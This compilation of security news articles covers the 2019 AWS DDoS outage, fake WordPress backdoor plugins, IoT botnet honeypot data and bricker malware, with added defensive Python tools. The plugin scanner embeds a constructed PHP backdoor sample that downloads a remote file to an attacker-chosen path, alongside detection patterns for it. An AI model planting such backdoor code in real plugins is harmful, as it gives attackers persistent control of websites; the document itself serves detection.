Google Cloud Platform suffered issues around the same time as Amazon Web Services but claims they were not caused by DDoS.

A significant distributed denial-of-service (DDoS) attack lasting approximately eight hours affected Amazon Web Services yesterday, knocking its S3 service and other services offline between 10:30 a.m. and 6:30 p.m. PDT.

The attack struck AWS’s Route 53 DNS service, which led to outages for other services that depend on public DNS resolution: Elastic Load Balancing, Relational Database Service, and Elastic Compute Cloud. AWS alerted customers while the attack was ongoing to inform them of “intermittent errors with resolution of some AWS DNS names.” Starting at 5:16 p.m., a small number of specific DNS names experienced a higher error rate. The issues have since been resolved.

Amazon says its Shield Advanced DDoS mitigation tool helped in managing the attack; however, some users were unable to connect because it categorized legitimate customer queries as malicious.

Around the same time as the AWS attack, Google Cloud Platform also experienced a range of problems. It’s believed the incidents are separate; GCP claims its issue was unrelated to DDoS.

Source: https://www.darkreading.com/cloud/eight-hour-ddos-attack-struck-aws-customers/d/d-id/1336165

 

Outages lasted for a full working day as the Route 53 DNS system was disrupted

Businesses were unable to service their customers for approximately eight hours yesterday after Amazon Web Services (AWS) servers were struck by a distributed denial-of-service (DDoS) attack.

After initially flagging DNS resolution errors, customers were informed that the Route 53 domain name system (DNS) was in the midst of an attack, according to statements from AWS Support circulating on social media.

From 6:30pm BST on Tuesday, a handful of customers suffered an outage to services while the attack persisted, lasting until approximately 2:30am on Wednesday morning, when services to the Route 53 DNS were restored. This was the equivalent of a full working day in some parts of the US.

“We are investigating reports of occasional DNS resolution errors. The AWS DNS servers are currently under a DDoS attack,” said a statement from AWS Support, circulated to customers and published across social media.

“Our DDoS mitigations are absorbing the vast majority of this traffic, but these mitigations are also flagging some legitimate customer queries at this time. We are actively working on additional mitigations, as well as tracking down the source of the attack to shut it down.”

Route 53 is AWS’s scalable DNS service, which gives developers and businesses a way to route end users to internet applications by translating domain names into numeric IP addresses. It is what connects users to infrastructure running in AWS, such as EC2 instances and S3 buckets, so when it cannot answer queries those resources become unreachable even though they are still running.

During the attack, AWS advised customers to update the configuration of clients accessing S3 buckets so that they specify the region the bucket is in when making requests. SDK users were likewise asked to set the region in their S3 client configuration so that the endpoint name is region-specific (for example s3.us-west-2.amazonaws.com rather than the global s3.amazonaws.com), so that requests no longer depend on resolving the global endpoint name.
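The following is an added example, not AWS’s guidance or code: a small Python audit that classifies the S3 endpoint each client is configured with, flags clients still on the global endpoint and rewrites them to the regional form. The hostname patterns are the documented S3 endpoint forms (virtual-hosted and path style, the legacy s3-<region> dash form, dualstack and the s3-external-1 alias); the client list is constructed, and make_client is a hypothetical helper around the real boto3.client call that is skipped when boto3 is not installed.

```python
"""Audit S3 client endpoints and rewrite global ones to region-specific names.

Added example; the client list below is constructed, not real configuration.
"""
import re
from urllib.parse import urlsplit, urlunsplit

# AWS region names look like us-west-2, eu-central-1 or us-gov-west-1.
REGION = r"[a-z]{2}(?:-gov)?-[a-z]+-\d"
REGION_RE = re.compile(rf"^{REGION}$")

# Regional endpoint, virtual-hosted (bucket.s3.region...) or path style
# (s3.region...), including the legacy s3-region dash form and dualstack.
_REGIONAL = re.compile(
    rf"^(?:(?P<bucket>[a-z0-9.-]+)\.)?s3(?:\.dualstack)?[.-](?P<region>{REGION})\.amazonaws\.com$"
)
# Global endpoint, plus its s3-external-1 alias.
_GLOBAL = re.compile(r"^(?:(?P<bucket>[a-z0-9.-]+)\.)?s3(?:-external-1)?\.amazonaws\.com$")


def classify(url):
    """Return (kind, bucket, region): kind is 'regional', 'global' or 'unknown'."""
    host = urlsplit(url).hostname or ""
    m = _REGIONAL.match(host)
    if m:
        return "regional", m.group("bucket"), m.group("region")
    m = _GLOBAL.match(host)
    if m:
        return "global", m.group("bucket"), None
    return "unknown", None, None


def regionalize(url, region):
    """Rewrite a global S3 URL to the regional endpoint; regional URLs pass through."""
    if not REGION_RE.match(region):
        raise ValueError(f"not a region name: {region}")
    kind, bucket, _ = classify(url)
    if kind == "regional":
        return url
    if kind != "global":
        raise ValueError(f"not an S3 endpoint: {url}")
    parts = urlsplit(url)
    host = f"s3.{region}.amazonaws.com"
    if bucket:  # keep virtual-hosted style if that is what the client used
        host = f"{bucket}.{host}"
    return urlunsplit((parts.scheme, host, parts.path, parts.query, parts.fragment))


# Constructed sample: three clients and the region their bucket lives in.
SAMPLE_CLIENTS = [
    {"name": "reports-uploader", "endpoint_url": "https://s3.amazonaws.com", "region": "us-west-2"},
    {"name": "asset-origin", "endpoint_url": "https://static-assets.s3.amazonaws.com", "region": "eu-west-1"},
    {"name": "backups", "endpoint_url": "https://backups.s3.us-east-1.amazonaws.com", "region": "us-east-1"},
]


def audit(clients):
    """List (name, regional_url) for every client still pointed at the global endpoint."""
    return [
        (c["name"], regionalize(c["endpoint_url"], c["region"]))
        for c in clients
        if classify(c["endpoint_url"])[0] == "global"
    ]


def make_client(region):
    """Hypothetical helper: a boto3 S3 client pinned to a regional endpoint.

    Returns None when boto3 is not installed so the rest of the module runs without it.
    """
    try:
        import boto3
    except ImportError:
        return None
    return boto3.client("s3", region_name=region,
                        endpoint_url=f"https://s3.{region}.amazonaws.com")


if __name__ == "__main__":
    for name, fixed in audit(SAMPLE_CLIENTS):
        print(f"{name}: uses the global endpoint, switch to {fixed}")
```

Run it against your own inventory of client endpoint settings (environment files, SDK config, CDN origins); anything reported by audit() is a client whose requests still hinge on the global name.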

Rather than infiltrating targeted software or devices, or exploiting vulnerabilities, a typical DDoS attack hinges on attackers bombarding a website or server with an excessive volume of access requests. This causes it to undergo service difficulties or go offline altogether.

All AWS services have been fully restored at the time of writing, however, the attack struck during a separate outage affecting Google Cloud Platform (GCP), although there’s no indication the two outages are connected.

From 12:30am GMT, GCP’s cloud networking system began experiencing issues in its US West region. Engineers then learned the issue had also affected a swathe of Google Cloud services, including Google Compute Engine, Cloud Memorystore, the Kubernetes Engine, Cloud Bigtable and Google Cloud Storage. All services were gradually repaired until they were fully restored by 4:30am GMT.

While outages on public cloud platforms are fairly common, they are rarely caused by DDoS attacks. Microsoft’s Azure and Office 365 services, for example, suffered a set of routine outages towards the end of last year and the beginning of 2019.

One instance was a global authentication outage towards the end of January this year that affected US government services and LinkedIn.

Source: https://www.cloudpro.co.uk/cloud-essentials/public-cloud/8276/aws-servers-hit-by-sustained-ddos-attack

Security researchers have discovered fake WordPress plugins that act as backdoors for hackers and could be used to carry out DDoS and brute force attacks.

According to a blog post by researchers at Sucuri, the fake plugins share their structure and header comments with the popular backup/restore plugin UpdraftPlus, a legitimate piece of software designed to help back up WordPress websites.
Researchers said that hackers have used different names for these fake plugins, including initiatorseo or updrat123.
“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” said researchers.
The plugin hides itself from any WordPress user whose browser does not send a specific User-Agent string (the string varies from plugin to plugin), so it does not appear in the dashboard. If a request carries a specific GET parameter, such as initiationactivity or testingkey, however, the plugin reports its presence, which lets the attacker confirm that the backdoor is still installed.
The primary purpose of these plugins is to serve as a backdoor, which allows attackers to upload arbitrary files to compromised websites. Researchers said that malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.
Researchers said that the names of these POST parameters have been unique for each plugin that they have analysed.
“In our experience, hackers have been using this backdoor to upload web shells to seemingly random locations,” said researchers.
Randomly named scripts have been uploaded to compromised sites’ root directories and used to carry out brute force attacks on other sites. Researchers said that while none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough.
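The traits described above (cloned UpdraftPlus metadata, User-Agent gating, a GET-parameter presence check, and POST parameters naming a remote URL and a destination path) can be looked for directly in plugin source. The following is an added example, not Sucuri’s tooling or code from the article: a scanner that reports which of those traits a plugin file exhibits. The two plugin sources it scans are constructed; the hiding mechanism (an all_plugins filter), the User-Agent value and the POST parameter names dl_url and dl_path are assumptions, since the article says those varied per sample.

```python
"""Flag WordPress plugin files that show the traits of the fake UpdraftPlus backdoors.

Added example. The two plugin sources below are constructed to illustrate the
traits; the hiding mechanism (an all_plugins filter) and the POST parameter
names are assumptions, since those varied per sample.
"""
import re
from pathlib import Path

# Header fields WordPress reads from the comment block of a plugin's main file.
_HEADER_RE = re.compile(r"^\s*\*?\s*(Plugin Name|Version):\s*(.+?)\s*$", re.M)
# GET parameters the code reacts to: candidates for an attacker's presence check.
_GET_RE = re.compile(r"\$_GET\s*\[\s*['\"]([A-Za-z0-9_]+)['\"]\s*\]")

# Legitimate plugins whose metadata gets cloned, keyed by their real directory slug.
KNOWN_PLUGINS = {"updraftplus": "UpdraftPlus"}

# Source-level indicators. Parameter names differ from sample to sample, so match
# the shape (request data flowing into a fetch or a file write), not a name.
INDICATORS = {
    "ua_gating": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "hidden_from_plugin_list": re.compile(r"add_filter\s*\(\s*['\"]all_plugins['\"]"),
    "remote_fetch": re.compile(r"(?:file_get_contents|curl_init|fopen)\s*\(\s*\$_(?:POST|GET|REQUEST)"),
    "request_controlled_write": re.compile(r"file_put_contents\s*\([^;]*\$_(?:POST|GET|REQUEST)"),
}


def scan_plugin(slug, source):
    """Return the indicator labels triggered by one plugin's main file."""
    findings = []
    header = dict(_HEADER_RE.findall(source))
    name = header.get("Plugin Name", "").lower()
    for real_slug, real_name in KNOWN_PLUGINS.items():
        if real_name.lower() in name and slug != real_slug:
            findings.append(f"impersonates:{real_slug}")
    findings += [label for label, rx in INDICATORS.items() if rx.search(source)]
    return findings


def presence_probes(source):
    """Sorted GET parameter names the plugin checks for."""
    return sorted(set(_GET_RE.findall(source)))


def verdict(slug, source):
    """'likely_backdoor' when a request-controlled file write is paired with concealment."""
    found = set(scan_plugin(slug, source))
    concealed = bool(found & {"ua_gating", "hidden_from_plugin_list"}) or any(
        f.startswith("impersonates:") for f in found)
    if "request_controlled_write" in found and concealed:
        return "likely_backdoor"
    return "suspicious" if found else "clean"


def scan_install(plugins_dir):
    """Run verdict() over every PHP file under wp-content/plugins, keyed by path."""
    results = {}
    for php in Path(plugins_dir).glob("*/*.php"):
        v = verdict(php.parent.name, php.read_text(errors="replace"))
        if v != "clean":
            results[str(php)] = v
    return results


# Constructed sample resembling the described fake plugin (directory slug: initiatorseo).
FAKE_PLUGIN = r"""<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Version: 1.16.16
*/
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (strpos($ua, 'Mozilla/5.0 (X11; Ubuntu)') === false) {
    add_filter('all_plugins', function ($plugins) {
        unset($plugins['initiatorseo/initiatorseo.php']);
        return $plugins;
    });
}
if (isset($_GET['initiationactivity'])) { echo 'active'; exit; }
if (isset($_POST['dl_url'], $_POST['dl_path'])) {
    file_put_contents(ABSPATH . $_POST['dl_path'], file_get_contents($_POST['dl_url']));
}
"""

# Constructed benign plugin for comparison.
BENIGN_PLUGIN = r"""<?php
/*
Plugin Name: Site Footer Note
Version: 0.3
*/
add_action('wp_footer', function () {
    echo '<p>' . esc_html(get_option('footer_note', '')) . '</p>';
});
"""

if __name__ == "__main__":
    print("initiatorseo:", verdict("initiatorseo", FAKE_PLUGIN), scan_plugin("initiatorseo", FAKE_PLUGIN))
    print("probes:", presence_probes(FAKE_PLUGIN))
    print("site-footer-note:", verdict("site-footer-note", BENIGN_PLUGIN))
```

Because the scan reads files on disk rather than the plugin list WordPress renders, it does not depend on the User-Agent the backdoor is waiting for; scan_install() is the call to point at a site’s wp-content/plugins directory, and a plugin that the dashboard does not list but the filesystem does is itself worth a look.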
“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” said researchers.
They added that compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that plugins can be an essential way to make your life more streamlined, but like with any application or e-commerce website that is unknown, reviews are there to help the user to separate the wheat from the chaff.
“Moreover, it is vital not to reuse passwords online and to make sure they are all complex – even if this becomes a hassle for multiple users who manage the sites. Password managers are no longer an inconvenience and reusing passwords will get you into a lot of troubled waters, not just with this issue. Naturally, patching is also key with all updates, but it is vital that users only download what they entirely need in terms of plugins. Many people can tend to keep plugins running even after a one time use, but it’s always best practice to keep only what is used regularly,” he said.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that companies should be wary of what plugins they are allowing on their site.
“While it may be tempting to install a novel plugin, one has to stop and ask whether it fulfils the needs of the business or if it is just a gimmick or nice to have,” he said.
“They should also audit and gain assurance for plugins and overall website functionality on a regular basis. This can be done with a combination of technical controls including scans, as well as periodically allowing experts to manually check, which can include reviewing logs, or conducting penetration tests.”
Source: https://www.scmagazineuk.com/look-inside-wordpress-plugins-fakes-used-cyber-criminals-plant-backdoors/article/1663135

Kaspersky honeypots – networks of virtual copies of various internet-connected devices and applications – detected 105 million attacks on IoT devices in H1 2019.

Kaspersky honeypots – networks of virtual copies of various internet-connected devices and applications – have detected 105 million attacks on IoT devices coming from 276,000 unique IP addresses in the first six months of the year. This figure is around nine times the number found in H1 2018, when only around 12 million attacks were spotted originating from 69,000 IP addresses. Capitalizing on the weak security of IoT products, cybercriminals are intensifying their attempts to create and monetize IoT botnets. This and other findings are part of the ‘IoT: a malware story’ report on honeypot activity in H1 2019.

Cyberattacks on IoT devices are booming: more and more people and organizations are buying ‘smart’ (network-connected and interactive) devices, such as routers or DVR security cameras, yet not everybody considers them worth protecting. Cybercriminals, however, see growing financial opportunities in exploiting such gadgets. They use networks of infected smart devices to conduct DDoS attacks or as proxies for other types of malicious activity. To learn more about how such attacks work and how to prevent them, Kaspersky experts set up honeypots – decoy devices used to attract the attention of cybercriminals and analyze their activities.

Based on the data collected from the honeypots, attacks on IoT devices are usually not sophisticated but stealthy, since users might not even notice their devices are being exploited. The malware family behind 39% of attacks – Mirai – is capable of using exploits, meaning these botnets can enter a device through old, unpatched vulnerabilities and take control of it. Another technique is password brute-forcing, the chosen method of the second most widespread malware family in the list, Nyadrop. Nyadrop was seen in 38.57% of attacks and often serves as a Mirai downloader. This family has been trending as one of the most active threats for a couple of years now. The third most common botnet threatening smart devices – Gafgyt, with 2.12% – also uses brute-forcing.

In addition, the researchers were able to identify the regions that were most often the source of infections in H1 2019: China accounted for 30% of all attacks, followed by Brazil (19%) and Egypt (12%). A year earlier, in H1 2018, the picture was different, with Brazil leading on 28%, China second with 14% and Japan third with 11%.

“As people become more and more surrounded by smart devices, we are witnessing how IoT attacks are intensifying. Judging by the enlarged number of attacks and criminals’ persistency, we can say that IoT is a fruitful area for attackers that use even the most primitive methods, like guessing password and login combinations. This is much easier than most people think: the most common combinations by far are usually “support/support”, followed by “admin/admin”, “default/default”. It’s quite easy to change the default password, so we urge everyone to take this simple step towards securing your smart devices” – said Dan Demeter, security researcher at Kaspersky Lab.
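The brute-forcing the report describes, and the support/support, admin/admin and default/default combinations Demeter cites, are easy to pick out of a device or gateway’s own authentication log. The following is an added example, not part of Kaspersky’s report or tooling: it parses a constructed telnet/SSH login log, tallies the credential pairs tried, flags sources that fire many attempts in a short window, and lists successful logins that used a factory credential pair, which is exactly the device whose default password was never changed. The log format and the extra entries in DEFAULT_CREDS beyond the three named in the report are assumptions.

```python
"""Summarise login attempts against IoT services from a consolidated auth log.

Added example. The log lines are constructed in a simple key=value form; adapt
parse_line() to the format of your own gateway or honeypot.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: one burst from a single source, one lucky hit, one slow scan.
SAMPLE_LOG = """\
2019-05-12T10:22:01Z telnet src=203.0.113.7 user=support pass=support result=fail
2019-05-12T10:22:02Z telnet src=203.0.113.7 user=admin pass=admin result=fail
2019-05-12T10:22:02Z telnet src=203.0.113.7 user=default pass=default result=fail
2019-05-12T10:22:03Z telnet src=203.0.113.7 user=root pass=12345 result=fail
2019-05-12T10:22:03Z telnet src=203.0.113.7 user=admin pass=1234 result=success
2019-05-12T10:30:10Z telnet src=198.51.100.9 user=support pass=support result=success
2019-05-12T11:05:44Z ssh src=192.0.2.20 user=admin pass=admin result=fail
2019-05-12T11:40:00Z ssh src=192.0.2.20 user=support pass=support result=fail
2019-05-12T11:41:00Z ssh src=192.0.2.20 user=pi pass=raspberry result=fail
"""

# Factory credential pairs. The first three are the ones the report names as most
# common; the remaining entries are constructed additions for the example.
DEFAULT_CREDS = {
    ("support", "support"), ("admin", "admin"), ("default", "default"),
    ("root", "root"), ("admin", "1234"),
}

_LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>\w+) src=(?P<src>\S+) user=(?P<user>\S*) "
    r"pass=(?P<pw>\S*) result=(?P<result>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = _LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
    event["ok"] = event.pop("result") == "success"
    return event


def load(text):
    """Parse a whole log, silently skipping lines in any other format."""
    return [e for e in map(parse_line, text.splitlines()) if e]


def top_credentials(events, n=3):
    """Most frequently tried (user, password) pairs, as (pair, count)."""
    return Counter((e["user"], e["pw"]) for e in events).most_common(n)


def brute_force_sources(events, threshold=4, window=timedelta(seconds=60)):
    """Sources that made at least `threshold` attempts inside any `window`-long span."""
    times = defaultdict(list)
    for e in events:
        times[e["src"]].append(e["ts"])
    flagged = set()
    for src, ts in times.items():
        ts.sort()
        start = 0
        for end in range(len(ts)):  # sliding window over sorted timestamps
            while ts[end] - ts[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(src)
                break
    return flagged


def default_cred_successes(events):
    """Successful logins that used a factory credential pair: unchanged passwords."""
    return [(e["src"], e["user"], e["pw"]) for e in events
            if e["ok"] and (e["user"], e["pw"]) in DEFAULT_CREDS]


if __name__ == "__main__":
    events = load(SAMPLE_LOG)
    print("top credentials:", top_credentials(events))
    print("brute-force sources:", sorted(brute_force_sources(events)))
    print("default-credential logins:", default_cred_successes(events))
```

The burst detector deliberately keys on rate rather than on failure alone, because the sample shows the pattern that matters most: a dictionary run that ends in a success. The default_cred_successes() output is the list of devices to reset first.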

To keep your devices safe, Kaspersky recommends users:

Install updates for the firmware you use as soon as possible. Once a vulnerability is found, it can be fixed through patches within updates.

Always change preinstalled passwords. Use complicated passwords that include both capital and lower case letters, numbers and symbols if it’s possible.

Reboot a device as soon as you think it’s acting strangely. It might help get rid of existing malware, but this doesn’t reduce the risk of getting another infection.

Keep access to IoT devices restricted by a local VPN, allowing you to access them from your “home” network, instead of publicly exposing them on the internet.

Kaspersky recommends companies to take the following measures:

Use threat data feeds to block network connections originating from malicious network addresses detected by security researchers. 

Make sure all devices’ software is up to date. Unpatched devices should be kept on a separate network that is inaccessible to unauthorised users.

Source: https://www.ameinfo.com/industry/technology/iot-more-than-100-million-attacks-on-smart-devices-h1-2019

Infosec vigilantism can cause serious harm in the era of industrial IoT and connected medical devices.

For several years now, security experts have been trying to bring attention to the growing threat that insecure Internet of Things (IoT) devices pose to networks around the world. The enormous growth in popular connected devices like webcams, DVRs, and smart watches has made it possible for hackers to amass huge botnets that can launch devastating distributed denial-of-service (DDoS) attacks.

Unfortunately, some vigilante hackers have tried to solve this problem with “bricker” malware that infects and destroys insecure IoT devices before they can become part of a botnet. This might seem like a positive on the surface, but this tactic creates serious, sometimes life-threatening risks as more IoT devices are used in industrial networks and healthcare organizations.

Let’s start at the beginning. IoT security became a top-of-mind issue in late 2016 thanks to the record-breaking DDoS attacks by the Mirai botnet and its subsequent source code release. In a perfect world, this should have been the wake-up call to improve IoT security. Unfortunately, slim profit margins and rapid development times kept IoT security considerations on the back burner and led some individuals to take matters into their own hands. The first instance of IoT vigilantism was in 2017 when a strain of malware known as BrickerBot began making its rounds.

Similar to the Mirai botnet, BrickerBot exploited flaws like insecure, hard-coded passphrases to log in to vulnerable IoT devices. But once it connected to a device, it didn’t add it to a massive botnet. Instead, it deleted files, corrupted the system storage, and disconnected the device from the Internet, effectively making it unusable. While it is possible to restore the device to factory defaults, the average IoT user likely doesn’t have the technical skills to do this. The author of BrickerBot, known by the pseudonym Janit0r, explained in an interview that his malware was intended to prevent devices from being infected by Mirai. Janit0r believed that if IoT manufacturers and owners weren’t going to take security seriously, then the devices shouldn’t exist to begin with.

In the end, BrickerBot destroyed over 10 million devices in just nine months before Janit0r retired it from service. While that may sound like a lot, it’s still less than one-tenth of 1% of the estimated 14 billion IoT devices online worldwide.

But the end of BrickerBot wasn’t the end of IoT bricking malware. In early 2019, a new variant of IoT bricking malware called Silex began infecting devices worldwide. Within a few hours, Silex had infected thousands of devices, deleting system files and firewall rules and effectively rendering them useless. With the Mirai source code public, it’s not a stretch to think there are other similar malware variants lurking undiscovered in the wild today. Thankfully, individual IoT owners can protect themselves from both botnets and brickers by changing the default passwords on their IoT devices, not exposing the telnet port (which BrickerBot uses to infect devices), and performing basic network segmentation and monitoring.

Bricker malware is dangerous because it doesn’t discriminate between different types of IoT devices. Almost every industry is incorporating IoT technology in some way. “Smart city” technology is becoming widely adopted across the globe, with municipalities connecting everything from power grids to traffic lights to networks. Healthcare is another sector that’s quickly adopting IoT technology, with the Internet of Medical Things projected to reach $136.8 billion worldwide by 2021. While some might question the need for refrigerators to connect to the Internet, there is no arguing that the ability to quickly share data from an ECG/EKG machine could be the difference between life and death. As widespread IoT adoption continues to grow within these sectors and overall, bricking malware can have some devastating consequences.

The problem is that many of these new IoT applications exhibit the same security lapses as consumer IoT devices, but with significantly higher risks if they fail. A rash of bricked industrial IoT sensors could cause widespread power outages, and an infusion pump or medical monitor that unexpectedly shuts off could put patients’ lives at risk. The authors of BrickerBot and Silex might not have been so ready to claim their work was for the good of the Internet if they truly considered the serious collateral damage that they might cause along the way.

There are other options to improve IoT security that don’t involve such a high degree of risk. Security researchers can work on raising awareness about connected device security, participating in public education initiatives and trying to drum up consumer demand for secure devices. Just last year the state of California, the fifth-largest economy in the world by GDP compared with other sovereign nations, passed Senate Bill 327, which mandates that manufacturers of connected devices equip their products with reasonable security features by January 2020. While the bill will have little effect on the masses of inexpensive IoT devices imported from foreign countries every year, it’s a step in the right direction that can be built upon with future legislation.

There is no denying the IoT industry needs to fundamentally change its approach to security, but vigilantism is not the answer. There are less destructive ways to convince both manufacturers and consumers that developing and deploying secure devices is worth the investment.

Source: https://www.darkreading.com/iot/why-bricking-vulnerable-iot-devices-comes-with-unintended-consequences-/a/d-id/1336009